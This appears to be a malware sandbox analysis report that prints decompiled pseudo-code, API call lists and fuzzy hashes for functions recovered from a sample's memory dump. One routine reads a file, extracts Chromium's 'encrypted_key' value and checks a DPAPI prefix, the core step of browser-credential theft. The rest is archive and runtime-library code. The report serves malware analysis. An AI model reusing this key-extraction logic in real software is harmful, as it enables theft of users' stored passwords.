                                        				intOrPtr _t47;
                                        				char* _t50;
                                        				long* _t58;
                                        				void* _t60;
                                        				intOrPtr _t67;
                                        				long* _t68;
                                        				char* _t69;
                                        				char* _t76;
                                        				char* _t84;
                                        				intOrPtr _t89;
                                        				char* _t90;
                                        				char* _t91;
                                        				intOrPtr _t96;
                                        				char _t97;
                                        				long* _t100;
                                        				signed int _t101;
                                        				void* _t102;
                                        				void* _t104;
                                        
                                        				_t85 = __edx;
                                        				_push(0xffffffff);
                                        				_push(E29DC1EC8);
                                        				_push( *[fs:0x0]);
                                        				_t42 =  *0x29dd5664; // 0xd9555f04
                                        				_t43 = _t42 ^ _t101;
                                        				_v20 = _t43;
                                        				_push(_t43);
                                        				 *[fs:0x0] =  &_v16;
                                        				_v68 = __ecx;
                                        				_v72 = __edx;
                                        				_v52 = 0;
                                        				_t46 = E29D99120(_a4,  &_v56,  &_v60);
                                        				_t104 = _t102 - 0x38 + 4;
                                        				if(_t46 == 0) {
                                        					L26:
                                        					_t47 = 0;
                                        					L24:
                                        					 *[fs:0x0] = _v16;
                                        					_pop(_t89);
                                        					_pop(_t96);
                                        					_pop(_t67);
                                        					return E29DADF46(_t47, _t67, _v20 ^ _t101, _t85, _t89, _t96);
                                        				}
                                        				_t97 = _v60;
                                        				if(_t97 == 0) {
                                        					goto L26;
                                        				}
                                        				_t68 = _v56;
                                        				if(_t68 == 0) {
                                        					goto L26;
                                        				}
                                        				_t85 = _t68 + 1;
                                        				_t90 = LocalAlloc(0x40, _t68 + 1);
                                        				if(_t90 == 0) {
                                        					L23:
                                        					_t47 = _v52;
                                        					goto L24;
                                        				}
                                        				if(_t68 == 0) {
                                        					L7:
                                        					_t50 = StrStrA(_t90, "encrypted_key");
                                        					if(_t50 == 0) {
                                        						_t47 = 0;
                                        						goto L24;
                                        					} else {
                                        						_t51 =  &(_t50[0x10]);
                                        						_t76 =  &(_t50[0x10]);
                                        						_v28 = 0xf;
                                        						_v32 = 0;
                                        						_v48 = 0;
                                        						_t16 =  &(_t76[1]); // -15
                                        						_t91 = _t16;
                                        						do {
                                        							_t85 =  *_t76;
                                        							_t76 =  &(_t76[1]);
                                        						} while (_t85 != 0);
                                        						E29D892C0( &_v48, _t51, _t76 - _t91);
                                        						_v8 = 0;
                                        						if(E29D95240(0,  &_v48, "\"}", 2) != 0xffffffff) {
                                        							E29D896C0( &_v48, _t54, 0xffffffff);
                                        						}
                                        						_t69 = _v48;
                                        						if(_v28 < 0x10) {
                                        							_t69 =  &_v48;
                                        						}
                                        						if(E29D991B0( &_v64, _t69,  &_v56) != 0) {
                                        							_t81 = _v64;
                                        							if(_v64 >= 5) {
                                        								_t58 = _v56;
                                        								_t85 =  *_t58;
                                        								if( *_t58 ==  *0x29dcdef4 && _t58[1] == 0x49) {
                                        									_t85 =  &_v60;
                                        									_t60 = E29D99210( &(_t58[1]), _t81 + 0xfffffffb,  &_v56,  &_v60);
                                        									_t104 = _t104 + 4;
                                        									if(_t60 != 0 && _v56 == 0x20) {
                                        										_v52 = 1;
                                        										E29D99280(_v72, _v68, _v60);
                                        										_t104 = _t104 + 4;
                                        									}
                                        								}
                                        							}
                                        						}
                                        						if(_v28 >= 0x10) {
                                        							_push(_v48);
                                        							E29DADF3B();
                                        						}
                                        						goto L23;
                                        					}
                                        				} else {
                                        					_t84 = _t90;
                                        					_t85 = _t97 - _t90;
                                        					_t100 = _t68;
                                        					do {
                                        						 *_t84 = _t84[_t85];
                                        						_t84 =  &(_t84[1]);
                                        						_t100 = _t100 - 1;
                                        					} while (_t100 != 0);
                                        					goto L7;
                                        				}
                                        			}


                                        APIs
                                          • Part of subcall function 29D99120: CreateFileA.KERNEL32(29D9F877,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?,D9555F04,00000008,00000000,00000000), ref: 29D99137
                                          • Part of subcall function 29D99120: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF,?,29D9F877,?), ref: 29D9914D
                                          • Part of subcall function 29D99120: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF,?,29D9F877,?), ref: 29D99164
                                          • Part of subcall function 29D99120: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF), ref: 29D9917D
                                          • Part of subcall function 29D99120: LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF,?,29D9F877,?), ref: 29D99199
                                          • Part of subcall function 29D99120: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF,?,29D9F877,?), ref: 29D991A0
                                        • LocalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF,?,29D9F877), ref: 29D9936C
                                        • StrStrA.SHLWAPI(00000000,encrypted_key,?,?,?,?,?,?,?,?,00000000,29DC1EC8,000000FF,?,29D9F877,?), ref: 29D99397
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileLocal$Alloc$CloseCreateFreeHandleReadSize
                                        • String ID: $encrypted_key
                                        • API String ID: 3874507483-1487440752
                                        • Opcode ID: ec740e454ed76bf772f8f162f56528b63672a032a8971a981f56e064646a3398
                                        • Instruction ID: 3eef530e9b76ef94fb7c48f4a761428786c01461ef20bbbde6a9a3bf138b9740
                                        • Opcode Fuzzy Hash: ec740e454ed76bf772f8f162f56528b63672a032a8971a981f56e064646a3398
                                        • Instruction Fuzzy Hash: 7A51E971D10208ABEB05DFA4D980BEEB775EF54710F54821DE511B7681DB306907DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 95%
                                        			E29D8C870(void __eax) {
                                        				char _v8;
                                        				char _v12;
                                        				char _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				char _v112;
                                        				char _v116;
                                        				intOrPtr _v120;
                                        				intOrPtr _v136;
                                        				char _v140;
                                        				char _v144;
                                        				void _v148;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				intOrPtr _t42;
                                        				void* _t49;
                                        				void* _t51;
                                        				intOrPtr _t54;
                                        				void* _t64;
                                        				void* _t78;
                                        				intOrPtr _t85;
                                        				intOrPtr _t89;
                                        				signed int _t91;
                                        				void _t96;
                                        
                                        				_t96 = __eax;
                                        				if(__eax == 0) {
                                        					L27:
                                        					return 0;
                                        				} else {
                                        					_t91 = 0;
                                        					_v148 = 0;
                                        					E29DB5640( &_v144, 0, 0x7c);
                                        					_t42 = E29D8C6A0(_t96);
                                        					_v20 = _t42;
                                        					if(_t42 == 0xffffffff) {
                                        						L7:
                                        						_t91 = _t91 | 0xffffffff;
                                        					} else {
                                        						if( *_t96 == 0) {
                                        							 *((intOrPtr*)(_t96 + 0x1c)) = _t42;
                                        							goto L6;
                                        						} else {
                                        							_t107 =  *((char*)(_t96 + 1));
                                        							if( *((char*)(_t96 + 1)) == 0) {
                                        								goto L7;
                                        							} else {
                                        								_t83 =  *((intOrPtr*)(_t96 + 0xc)) + _t42;
                                        								SetFilePointer( *(_t96 + 4),  *((intOrPtr*)(_t96 + 0xc)) + _t42, 0, 0);
                                        								L6:
                                        								if(E29D8C5D0(_t96,  &_v8, _t83, _t107) != 0) {
                                        									goto L7;
                                        								}
                                        							}
                                        						}
                                        					}
                                        					_v8 = 0;
                                        					_t110 = _t91;
                                        					if(_t91 == 0 && E29D8C580(_t96,  &_v8, _t83, _t110) != 0) {
                                        						_t91 = _t91 | 0xffffffff;
                                        					}
                                        					_v16 = 0;
                                        					_t113 = _t91;
                                        					if(_t91 == 0) {
                                        						_t64 = E29D8C580(_t96,  &_v16, _t83, _t113);
                                        						_t114 = _t64;
                                        						if(_t64 != 0 || E29D8C580(_t96,  &_v144, _t83, _t114) != 0) {
                                        							_t91 = _t91 | 0xffffffff;
                                        						}
                                        					}
                                        					_v12 = 0;
                                        					_t117 = _t91;
                                        					if(_t91 != 0 || E29D8C580(_t96,  &_v12, _t83, _t117) != 0 || _v12 != _v144 || _v16 != _t91) {
                                        						L24:
                                        						if( *((char*)(_t96 + 0x10)) != 0) {
                                        							CloseHandle( *(_t96 + 4));
                                        						}
                                        						_push(_t96);
                                        						E29DADF3B();
                                        						goto L27;
                                        					} else {
                                        						_t121 = _v8 - _t91;
                                        						if(_v8 != _t91) {
                                        							goto L24;
                                        						} else {
                                        							_t49 = E29D8C5D0(_t96,  &_v116, _t83, _t121);
                                        							_t122 = _t49;
                                        							if(_t49 != 0) {
                                        								goto L24;
                                        							} else {
                                        								_t51 = E29D8C5D0(_t96,  &_v112, _t83, _t122);
                                        								_t123 = _t51;
                                        								if(_t51 != 0 || E29D8C580(_t96,  &_v140, _t83, _t123) != 0) {
                                        									goto L24;
                                        								} else {
                                        									_t54 =  *((intOrPtr*)(_t96 + 0xc));
                                        									_t85 = _v20;
                                        									_t89 = _v112;
                                        									_t92 = _t54 + _t85;
                                        									if(_t54 + _t85 >= _v116 + _t89) {
                                        										_v136 = _t54 - _v116 - _t89 + _t85;
                                        										__eflags = 0;
                                        										_v148 = _t96;
                                        										_v120 = _t85;
                                        										_v24 = 0;
                                        										 *((intOrPtr*)(_t96 + 0xc)) = 0;
                                        										_t78 = E29DADFE0(_t89, _t92, _t96, 0x80);
                                        										memcpy(_t78,  &_v148, 0x20 << 2);
                                        										E29D8CE10(_t78);
                                        										return _t78;
                                        									} else {
                                        										goto L24;
                                        									}
                                        								}
                                        							}
                                        						}
                                        					}
                                        				}
                                        			}


                                        APIs
                                        • _memset.LIBCMT ref: 29D8C898
                                          • Part of subcall function 29D8C6A0: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 29D8C6BB
                                          • Part of subcall function 29D8C6A0: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 29D8C6D7
                                          • Part of subcall function 29D8C6A0: _malloc.LIBCMT ref: 29D8C721
                                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 29D8C8C4
                                        • CloseHandle.KERNEL32(00000000), ref: 29D8C9A3
                                        • _malloc.LIBCMT ref: 29D8C9DE
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FilePointer$_malloc$CloseHandle_memset
                                        • String ID:
                                        • API String ID: 3969787500-0
                                        • Opcode ID: c21d45e1c3287df5c7c7cd3428cb7b1c68a17e6d2aaf205414d11c92539a1821
                                        • Instruction ID: c82b381c9605e85a2652dfd9c80e3d48fe310f64664f1697e819cffe1d177a0d
                                        • Opcode Fuzzy Hash: c21d45e1c3287df5c7c7cd3428cb7b1c68a17e6d2aaf205414d11c92539a1821
                                        • Instruction Fuzzy Hash: F341D371A41714EBDB21DE75D840B9EB3B4FF85250F008E9EDD5893A82F7309A0B9B60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 96%
                                        			E29DAF844(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                        				signed int _v8;
                                        				signed int _v12;
                                        				signed int _v16;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* __ebp;
                                        				signed int _t56;
                                        				signed int _t60;
                                        				void* _t65;
                                        				signed int _t66;
                                        				signed int _t69;
                                        				signed int _t71;
                                        				signed int _t72;
                                        				signed int _t74;
                                        				signed int _t75;
                                        				signed int _t78;
                                        				signed int _t79;
                                        				signed int _t81;
                                        				signed int _t85;
                                        				signed int _t92;
                                        				signed int _t93;
                                        				signed int _t94;
                                        				signed int _t95;
                                        				intOrPtr* _t96;
                                        				void* _t97;
                                        
                                        				_t92 = _a8;
                                        				if(_t92 == 0 || _a12 == 0) {
                                        					L4:
                                        					return 0;
                                        				} else {
                                        					_t96 = _a16;
                                        					_t100 = _t96;
                                        					if(_t96 != 0) {
                                        						_t79 = _a4;
                                        						__eflags = _t79;
                                        						if(__eflags == 0) {
                                        							goto L3;
                                        						}
                                        						_t60 = _t56 | 0xffffffff;
                                        						_t88 = _t60 % _t92;
                                        						__eflags = _a12 - _t60 / _t92;
                                        						if(__eflags > 0) {
                                        							goto L3;
                                        						}
                                        						_t93 = _t92 * _a12;
                                        						__eflags =  *(_t96 + 0xc) & 0x0000010c;
                                        						_v8 = _t79;
                                        						_v16 = _t93;
                                        						_t78 = _t93;
                                        						if(( *(_t96 + 0xc) & 0x0000010c) == 0) {
                                        							_v12 = 0x1000;
                                        						} else {
                                        							_v12 =  *(_t96 + 0x18);
                                        						}
                                        						__eflags = _t93;
                                        						if(_t93 == 0) {
                                        							L32:
                                        							return _a12;
                                        						} else {
                                        							do {
                                        								_t81 =  *(_t96 + 0xc) & 0x00000108;
                                        								__eflags = _t81;
                                        								if(_t81 == 0) {
                                        									L18:
                                        									__eflags = _t78 - _v12;
                                        									if(_t78 < _v12) {
                                        										_t65 = E29DB3709(_t88, _t93,  *_v8, _t96);
                                        										__eflags = _t65 - 0xffffffff;
                                        										if(_t65 == 0xffffffff) {
                                        											L34:
                                        											_t66 = _t93;
                                        											L35:
                                        											return (_t66 - _t78) / _a8;
                                        										}
                                        										_v8 = _v8 + 1;
                                        										_t69 =  *(_t96 + 0x18);
                                        										_t78 = _t78 - 1;
                                        										_v12 = _t69;
                                        										__eflags = _t69;
                                        										if(_t69 <= 0) {
                                        											_v12 = 1;
                                        										}
                                        										goto L31;
                                        									}
                                        									__eflags = _t81;
                                        									if(_t81 == 0) {
                                        										L21:
                                        										__eflags = _v12;
                                        										_t94 = _t78;
                                        										if(_v12 != 0) {
                                        											_t72 = _t78;
                                        											_t88 = _t72 % _v12;
                                        											_t94 = _t94 - _t72 % _v12;
                                        											__eflags = _t94;
                                        										}
                                        										_push(_t94);
                                        										_push(_v8);
                                        										_push(E29DB5E84(_t96));
                                        										_t71 = E29DB6D5F(_t78, _t88, _t94, _t96, __eflags);
                                        										_t97 = _t97 + 0xc;
                                        										__eflags = _t71 - 0xffffffff;
                                        										if(_t71 == 0xffffffff) {
                                        											L36:
                                        											 *(_t96 + 0xc) =  *(_t96 + 0xc) | 0x00000020;
                                        											_t66 = _v16;
                                        											goto L35;
                                        										} else {
                                        											_t85 = _t94;
                                        											__eflags = _t71 - _t94;
                                        											if(_t71 <= _t94) {
                                        												_t85 = _t71;
                                        											}
                                        											_v8 = _v8 + _t85;
                                        											_t78 = _t78 - _t85;
                                        											__eflags = _t71 - _t94;
                                        											if(_t71 < _t94) {
                                        												goto L36;
                                        											} else {
                                        												L27:
                                        												_t93 = _v16;
                                        												goto L31;
                                        											}
                                        										}
                                        									}
                                        									_t74 = E29DAF3C4(_t88, _t96);
                                        									__eflags = _t74;
                                        									if(_t74 != 0) {
                                        										goto L34;
                                        									}
                                        									goto L21;
                                        								}
                                        								_t75 =  *(_t96 + 4);
                                        								__eflags = _t75;
                                        								if(__eflags == 0) {
                                        									goto L18;
                                        								}
                                        								if(__eflags < 0) {
                                        									_t45 = _t96 + 0xc;
                                        									 *_t45 =  *(_t96 + 0xc) | 0x00000020;
                                        									__eflags =  *_t45;
                                        									goto L34;
                                        								}
                                        								_t95 = _t78;
                                        								__eflags = _t78 - _t75;
                                        								if(_t78 >= _t75) {
                                        									_t95 = _t75;
                                        								}
                                        								E29DB0010( *_t96, _v8, _t95);
                                        								 *(_t96 + 4) =  *(_t96 + 4) - _t95;
                                        								 *_t96 =  *_t96 + _t95;
                                        								_t97 = _t97 + 0xc;
                                        								_t78 = _t78 - _t95;
                                        								_v8 = _v8 + _t95;
                                        								goto L27;
                                        								L31:
                                        								__eflags = _t78;
                                        							} while (_t78 != 0);
                                        							goto L32;
                                        						}
                                        					}
                                        					L3:
                                        					 *((intOrPtr*)(E29DB2030(_t100))) = 0x16;
                                        					E29DB39F7();
                                        					goto L4;
                                        				}
                                        			}






























                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                        • String ID:
                                        • API String ID: 2782032738-0
                                        • Opcode ID: 6b597378c93f628fcead3b743d65e49d447bbd7f6b550e316aec30b7f5e203ad
                                        • Instruction ID: dcbde5467512bd0e7f07f0459c08175391fdb7c93a1f8977e8560dbcc7b22a49
                                        • Opcode Fuzzy Hash: 6b597378c93f628fcead3b743d65e49d447bbd7f6b550e316aec30b7f5e203ad
                                        • Instruction Fuzzy Hash: E941E673A00704ABDB188FBEC58065EBBB5EF80360F2085BDD4959B950D770DA63BB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29DBD1EF(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                        				char _v8;
                                        				signed int _v12;
                                        				char _v20;
                                        				char _t43;
                                        				char _t46;
                                        				signed int _t53;
                                        				signed int _t54;
                                        				intOrPtr _t56;
                                        				int _t57;
                                        				int _t58;
                                        				char _t59;
                                        				short* _t60;
                                        				int _t65;
                                        				char* _t73;
                                        
                                        				_t73 = _a8;
                                        				if(_t73 == 0 || _a12 == 0) {
                                        					L5:
                                        					return 0;
                                        				} else {
                                        					if( *_t73 != 0) {
                                        						E29DAE78E( &_v20, __edi, _a16);
                                        						_t43 = _v20;
                                        						__eflags =  *(_t43 + 0x14);
                                        						if( *(_t43 + 0x14) != 0) {
                                        							_t46 = E29DB71BF( *_t73 & 0x000000ff,  &_v20);
                                        							__eflags = _t46;
                                        							if(_t46 == 0) {
                                        								__eflags = _a4;
                                        								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                                        								if(__eflags != 0) {
                                        									L10:
                                        									__eflags = _v8;
                                        									if(_v8 != 0) {
                                        										_t53 = _v12;
                                        										_t11 = _t53 + 0x70;
                                        										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                        										__eflags =  *_t11;
                                        									}
                                        									return 1;
                                        								}
                                        								L21:
                                        								_t54 = E29DB2030(__eflags);
                                        								 *_t54 = 0x2a;
                                        								__eflags = _v8;
                                        								if(_v8 != 0) {
                                        									_t54 = _v12;
                                        									_t33 = _t54 + 0x70;
                                        									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                        									__eflags =  *_t33;
                                        								}
                                        								return _t54 | 0xffffffff;
                                        							}
                                        							_t56 = _v20;
                                        							_t65 =  *(_t56 + 0xac);
                                        							__eflags = _t65 - 1;
                                        							if(_t65 <= 1) {
                                        								L17:
                                        								__eflags = _a12 -  *(_t56 + 0xac);
                                        								if(__eflags < 0) {
                                        									goto L21;
                                        								}
                                        								__eflags = _t73[1];
                                        								if(__eflags == 0) {
                                        									goto L21;
                                        								}
                                        								L19:
                                        								_t57 =  *(_t56 + 0xac);
                                        								__eflags = _v8;
                                        								if(_v8 == 0) {
                                        									return _t57;
                                        								}
                                        								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                        								return _t57;
                                        							}
                                        							__eflags = _a12 - _t65;
                                        							if(_a12 < _t65) {
                                        								goto L17;
                                        							}
                                        							__eflags = _a4;
                                        							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                                        							__eflags = _t58;
                                        							_t56 = _v20;
                                        							if(_t58 != 0) {
                                        								goto L19;
                                        							}
                                        							goto L17;
                                        						}
                                        						_t59 = _a4;
                                        						__eflags = _t59;
                                        						if(_t59 != 0) {
                                        							 *_t59 =  *_t73 & 0x000000ff;
                                        						}
                                        						goto L10;
                                        					} else {
                                        						_t60 = _a4;
                                        						if(_t60 != 0) {
                                        							 *_t60 = 0;
                                        						}
                                        						goto L5;
                                        					}
                                        				}
                                        			}


















                                        APIs
                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 29DBD223
                                        • __isleadbyte_l.LIBCMT ref: 29DBD256
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,29DAE5FB,?,00000000,00000000,?,?,?,?,29DAE5FB,00000000), ref: 29DBD287
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,29DAE5FB,00000001,00000000,00000000,?,?,?,?,29DAE5FB,00000000), ref: 29DBD2F5
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                        • String ID:
                                        • API String ID: 3058430110-0
                                        • Opcode ID: 6268bf2bddd781d3141793cb734fd8b8da66c36867ff2093a7b01043a6f87fe3
                                        • Instruction ID: 38326788a119f148a5bf91a6944e475705116a204699c16235cad87758463216
                                        • Opcode Fuzzy Hash: 6268bf2bddd781d3141793cb734fd8b8da66c36867ff2093a7b01043a6f87fe3
                                        • Instruction Fuzzy Hash: 9B31D2B1A002C6EFDB14DFA4C8A5EAD3BB5BF01310B14856DE5668F591D331D942EB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 94%
                                        			E29DADBB1(signed int _a4, signed int _a8, signed int _a9, char _a10) {
                                        				signed char _v7;
                                        				signed char _v8;
                                        				signed char _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				void* __edi;
                                        				void* __esi;
                                        				intOrPtr _t42;
                                        				signed int _t47;
                                        				signed int _t51;
                                        				signed int _t52;
                                        				intOrPtr _t57;
                                        				signed int _t59;
                                        				signed int _t64;
                                        				void* _t72;
                                        				void* _t73;
                                        				signed int _t76;
                                        
                                        				_t76 = _a8;
                                        				_t79 = _t76;
                                        				if(_t76 != 0) {
                                        					_v16 =  *_t76;
                                        					_t42 =  *((intOrPtr*)(_t76 + 4));
                                        				} else {
                                        					_v16 =  *((intOrPtr*)(E29DB1EE9(_t72, _t73, _t76, _t79) + 8));
                                        					_t42 = E29DB1EC3(_t72, _t73, _t76, _t79);
                                        				}
                                        				_v20 = _t42;
                                        				if(_v16 != 0) {
                                        					_t64 = _a4;
                                        					_push(_t73);
                                        					__eflags = _t64 - 0x100;
                                        					if(_t64 >= 0x100) {
                                        						L11:
                                        						__eflags = _t76;
                                        						if(__eflags != 0) {
                                        							_v12 = _t64;
                                        							_v12 = _v12 >> 8;
                                        							_t47 =  *( *((intOrPtr*)(_t76 + 8)) + (_v12 & 0x000000ff) * 2) >> 0x0000000f & 0x00000001;
                                        							__eflags = _t47;
                                        							L14:
                                        							__eflags = _t47;
                                        							if(__eflags == 0) {
                                        								_a8 = _t64;
                                        								_a9 = 0;
                                        								__eflags = 1;
                                        							} else {
                                        								_push(2);
                                        								_a8 = _v12;
                                        								_a9 = _t64;
                                        								_a10 = 0;
                                        								_pop(1);
                                        							}
                                        							_t51 = E29DB1930(0x100, __eflags, 0, _v16, 0x100,  &_a8, 1,  &_v8, 3, _v20, 1);
                                        							__eflags = _t51;
                                        							if(_t51 != 0) {
                                        								__eflags = _t51 - 1;
                                        								_t52 = _v8 & 0x000000ff;
                                        								if(_t51 != 1) {
                                        									_t52 = _t52 << 0x00000008 | _v7 & 0x000000ff;
                                        									__eflags = _t52;
                                        								}
                                        								goto L21;
                                        							} else {
                                        								L18:
                                        								_t52 = _t64;
                                        								L21:
                                        								return _t52;
                                        							}
                                        						}
                                        						L12:
                                        						_v12 = _t64;
                                        						_v12 = _v12 >> 8;
                                        						_t47 =  *(E29DB1976(_t72, 0x100, _t76, __eflags) + (_v12 & 0x000000ff) * 2) & 0x8000;
                                        						goto L14;
                                        					}
                                        					__eflags = _t76;
                                        					if(_t76 != 0) {
                                        						_t57 =  *((intOrPtr*)(_t76 + 8));
                                        						__eflags =  *(_t57 + _t64 * 2) & 0x00000001;
                                        						if(( *(_t57 + _t64 * 2) & 0x00000001) == 0) {
                                        							goto L18;
                                        						}
                                        						goto L11;
                                        					}
                                        					__eflags = E29DB19F0(_t64);
                                        					if(__eflags != 0) {
                                        						goto L12;
                                        					}
                                        					goto L18;
                                        				} else {
                                        					_t59 = _a4;
                                        					if(_t59 - 0x41 > 0x19) {
                                        						return _t59;
                                        					}
                                        					return _t59 + 0x20;
                                        				}
                                        			}

                                        APIs
                                        • ____lc_handle_func.LIBCMT ref: 29DADBC1
                                          • Part of subcall function 29DB1EE9: __getptd.LIBCMT ref: 29DB1EE9
                                        • ____lc_codepage_func.LIBCMT ref: 29DADBCC
                                          • Part of subcall function 29DB1EC3: __getptd.LIBCMT ref: 29DB1EC3
                                        • ___pctype_func.LIBCMT ref: 29DADC31
                                        • ___crtLCMapStringA.LIBCMT ref: 29DADC97
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __getptd$String____lc_codepage_func____lc_handle_func___crt___pctype_func
                                        • String ID:
                                        • API String ID: 3477544643-0
                                        • Opcode ID: 02798bb984ebb1420df963bbb0f11749fab37cb4914cd90187ebd2638bea77e2
                                        • Instruction ID: 6e1fad04668814e4d51bff19589f597102b9ed394bf0911899957ccadfa40af8
                                        • Opcode Fuzzy Hash: 02798bb984ebb1420df963bbb0f11749fab37cb4914cd90187ebd2638bea77e2
                                        • Instruction Fuzzy Hash: 82316C71904254BEDB118F55C891F9D7BF8AF14300F44804EE895DF692DAB8D762EB20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 85%
                                        			E29DAC370(intOrPtr __ecx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
                                        				signed int _v12;
                                        				struct _SYSTEMTIME _v28;
                                        				struct _SYSTEMTIME _v44;
                                        				struct _FILETIME _v52;
                                        				struct _FILETIME _v60;
                                        				void* __ebx;
                                        				signed int _t41;
                                        				intOrPtr _t43;
                                        				intOrPtr _t51;
                                        				intOrPtr _t72;
                                        				intOrPtr _t84;
                                        				intOrPtr _t87;
                                        				signed int _t95;
                                        
                                        				_t94 = __esi;
                                        				_t93 = __edi;
                                        				_t41 =  *0x29dd5664; // 0xd9555f04
                                        				_v12 = _t41 ^ _t95;
                                        				_t43 = _a4;
                                        				 *((intOrPtr*)(__esi + 0x7c)) = 0;
                                        				 *((intOrPtr*)(__esi + 0x84)) = __ecx;
                                        				 *((char*)(__esi + 0x80)) = 0;
                                        				 *((intOrPtr*)(__esi + 0x78)) = 0;
                                        				 *((intOrPtr*)(__esi + 0x90)) = 0;
                                        				 *((intOrPtr*)(__esi + 0x74)) = 0;
                                        				 *((intOrPtr*)(__esi + 0x88)) = _t43;
                                        				 *((intOrPtr*)(__esi + 0x8c)) = 0;
                                        				if(__ecx == 0 || _t43 == 0) {
                                        					return E29DADF46(0x10000, 0, _v12 ^ _t95, _t84, _t93, _t94);
                                        				} else {
                                        					 *((intOrPtr*)(__esi + 0x70)) = _t43;
                                        					 *((intOrPtr*)(__esi + 0x4c)) = 0x80000000;
                                        					 *((char*)(__esi + 0x6c)) = 1;
                                        					GetLocalTime( &_v44);
                                        					SystemTimeToFileTime( &_v44,  &_v52);
                                        					_v60.dwLowDateTime = _v52.dwLowDateTime;
                                        					_v60.dwHighDateTime = _v52.dwHighDateTime;
                                        					FileTimeToSystemTime( &_v60,  &_v28);
                                        					_t87 = _v52.dwHighDateTime;
                                        					asm("sbb edx, 0x19db1de");
                                        					_t51 = E29DB75A0(_v52.dwLowDateTime - 0xd53e8000, _t87, 0x989680, 0);
                                        					 *((intOrPtr*)(__esi + 0x50)) = _t51;
                                        					 *((intOrPtr*)(__esi + 0x58)) = _t51;
                                        					 *((intOrPtr*)(__esi + 0x60)) = _t51;
                                        					_t72 = _t87;
                                        					 *((intOrPtr*)(__esi + 0x5c)) = _t72;
                                        					 *((intOrPtr*)(__esi + 0x64)) = _t72;
                                        					 *((intOrPtr*)(__esi + 0x54)) = _t87;
                                        					 *(__esi + 0x68) = ((_v28.wYear + 0xffffffc4 << 0x00000004 | _v28.wMonth & 0x0000000f) << 0x00000005 & 0x0000ffff | _v28.wDay & 0x0000001f) << 0x00000010 | (_v28.wMinute & 0x0000003f | _v28.wHour << 0x00000006) << 0x00000005 & 0x0000ffff | _v28.wSecond + _v28.wSecond & 0x0000001f;
                                        					return E29DADF46(0, 0, _v12 ^ _t95, ((_v28.wYear + 0xffffffc4 << 0x00000004 | _v28.wMonth & 0x0000000f) << 0x00000005 & 0x0000ffff | _v28.wDay & 0x0000001f) << 0x00000010 | (_v28.wMinute & 0x0000003f | _v28.wHour << 0x00000006) << 0x00000005 & 0x0000ffff | _v28.wSecond + _v28.wSecond & 0x0000001f, __edi, __esi);
                                        				}
                                        			}

                                        APIs
